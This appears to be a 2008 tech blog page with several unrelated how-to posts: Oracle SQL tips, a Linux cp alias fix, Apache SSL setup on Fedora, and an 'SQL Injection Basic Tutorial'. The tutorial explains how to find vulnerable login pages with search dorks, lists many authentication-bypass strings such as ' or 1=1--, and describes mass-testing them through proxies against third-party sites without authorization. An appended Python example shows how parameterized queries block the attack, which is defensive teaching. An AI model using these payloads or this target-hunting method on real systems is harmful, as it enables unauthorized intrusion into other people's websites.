Thursday, 18 December 2008
Oracle Update Based On Multiple Tables
In MySQL, the following SQL script can usually be used:
UPDATE [table_name_1] [alias_1],[table_name_2] [alias_2]
SET [alias_1].[column_name] = [alias_2].[column_name]
WHERE
[condition]
But in Oracle it can only be done against a single field, using the following SQL script:
UPDATE [table_name] [alias]
SET ([column_name], [column_name]) =
(SELECT [column_name], [column_name]
FROM [table_name]
WHERE [alias.column_name] = [alias.column_name]);
Linux Copy Without Overwrite Confirmation
"cp -i"--that is, it asks me if I'm sure whether or not I want to overwrite
umpteen files and I have to hit "y" and Enter a zillion times.
Any suggestions?
Thanks.
Check if you have an alias for 'cp'.
Type
$ alias
...
...
alias cp='cp -i'
...
...
And do
$ unalias cp
Oracle Not A Group By Expression Error
Problem
When using a GROUP BY clause every field in the SELECT list must be either:
- One of the GROUP BY terms - in this case region
- An aggregate function - for example SUM or COUNT
- An expression based on the above
In the example the field "name" may not be used on the SELECT line.
In a group by line each region shows up only once - however in a typical region such as Africa there are several different "name" values. Which one should SQL pick?
Solutions
- Remove the offending field from the SELECT line
- Add the field to the GROUP BY clause
- Aggregate the offending field
SQL Injection Basic Tutorial
this tutorial is not going to go into detail on why these strings work as am not a coder i just know what i know and it works
SEARCH:
admin\login.asp
login.asp
with these two search strings you will have plenty of targets to choose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
in fact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most commonly used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and up to now only Ares has performed well with quite a bit
of success with a combo list formatted this way, yesterday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go through 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plenty more
now using proxies set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont select all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so too slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable will show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls where user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
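Why the ' or 1=1-- string above gets past a login form, and how bound parameters stop it, as an added example that is not part of the original tutorial. It assumes the login page builds its query by string concatenation; the sqlite3 table, the account and the function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample data: one account in an in-memory database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password only to keep the example short; store a hash in practice.
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def concatenated_query(user, password):
    # Vulnerable pattern: input is pasted into the SQL text, so a quote in the
    # input closes the string literal and whatever follows is parsed as SQL.
    return ("SELECT username FROM users WHERE username = '" + user +
            "' AND password = '" + password + "'")

def login_vulnerable(db, user, password):
    return db.execute(concatenated_query(user, password)).fetchone() is not None

def login_parameterized(db, user, password):
    # Hardened: the ? placeholders bind the input as values. Quotes and "--"
    # inside it are compared as literal characters, never parsed.
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (user, password)).fetchone()
    return row is not None

def compare(db, attempts):
    """Return (user, password, vulnerable_result, parameterized_result) rows."""
    return [(u, p, login_vulnerable(db, u, p), login_parameterized(db, u, p))
            for u, p in attempts]

if __name__ == "__main__":
    db = make_db()
    # The SQL text the database actually receives for the page's first string:
    print(concatenated_query("admin", "' or 1=1--"))
    attempts = [("admin", "constructed-secret"),  # legitimate login
                ("admin", "wrong"),               # plain bad password
                ("admin", "' or 1=1--"),          # string from the tutorial
                ("admin'--", "anything")]         # "admin'--" variation
    for row in compare(db, attempts):
        print(row)
```

In the concatenated query the -- comments out the trailing quote and or 1=1 makes the WHERE clause true for every row, so the login succeeds without a valid password. With placeholders the same input is just a wrong password.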
Create SSL Cert in Fedora Core 6
1. Open up a command line window and promote yourself to root using su - and type the following:
openssl genrsa -out sslkey.key 2048
This will create a 2048-bit RSA private key. A 1024 bit key is probably plenty, but why not have a little fun and make a ridiculously high level encryption key. The “sslkey.key” is the filename and you can use whatever you want here.
2. Create a self-signed certificate from that key file that Apache will use to create our https session.
openssl req -new -key sslkey.key -x509 -out sslcert.crt
Again, “sslcert.crt” can be whatever you want. Another good name for these would be yourdomainname.crt
3. Do a little directory organization. You’re going to want to place these two files in a place that makes sense
mkdir /etc/httpd/conf/ssl.crt
mkdir /etc/httpd/conf/ssl.key
mv sslkey.key /etc/httpd/conf/ssl.key
mv sslcert.crt /etc/httpd/conf/ssl.crt
Now, I moved on to the second part of this process, which is configuring Apache to use our certificate:
4. Backup httpd.conf and open it to edit using an editor of your choice
cd /etc/httpd/conf
cp httpd.conf httpd.bak
vi httpd.conf
5. Tab to the bottom of the configuration file. Somewhere towards the bottom you’ll see a section about creating Virtualhosts. This is what we need to do for SSL to work correctly. I added the following, changing everything in caps to the settings for my server:
DocumentRoot /var/www/html
ServerName DOMAINNAME
ServerAdmin MYEMAILADDRESS
ErrorLog /var/log/error_log
TransferLog /var/log/access_log
SSLEngine on
SSLCertificateFile /etc/httpd/conf/ssl.crt/sslcert.crt
SSLCertificateKeyFile /etc/httpd/conf/ssl.key/sslkey.key
# SSLCACertificateFile /etc/httpd/conf/ssl.crt/ca-bundle.crt
SSLOptions +StdEnvVars
SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
CustomLog /var/log/ssl_request_log \
"%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
I commented out the SSLCACertificateFile line as this is really only needed if you have multiple certificate files. It is just a file that would be used to point your clients to all the certificate files that you have. Purely optional in this case.
I then issued a “service httpd restart” command to restart Apache. By default mod_ssl should be set up on Fedora Core 6. One way to check is to make sure you have an ssl.conf file in /etc/httpd/conf.d and to look for the line that makes Apache use the module:
cat /etc/httpd/conf.d/ssl.conf | grep mod_ssl.so
This should return:
LoadModule ssl_module modules/mod_ssl.so
Then you’re all set. Test this out by going to your new ssl website! https://yourdomainname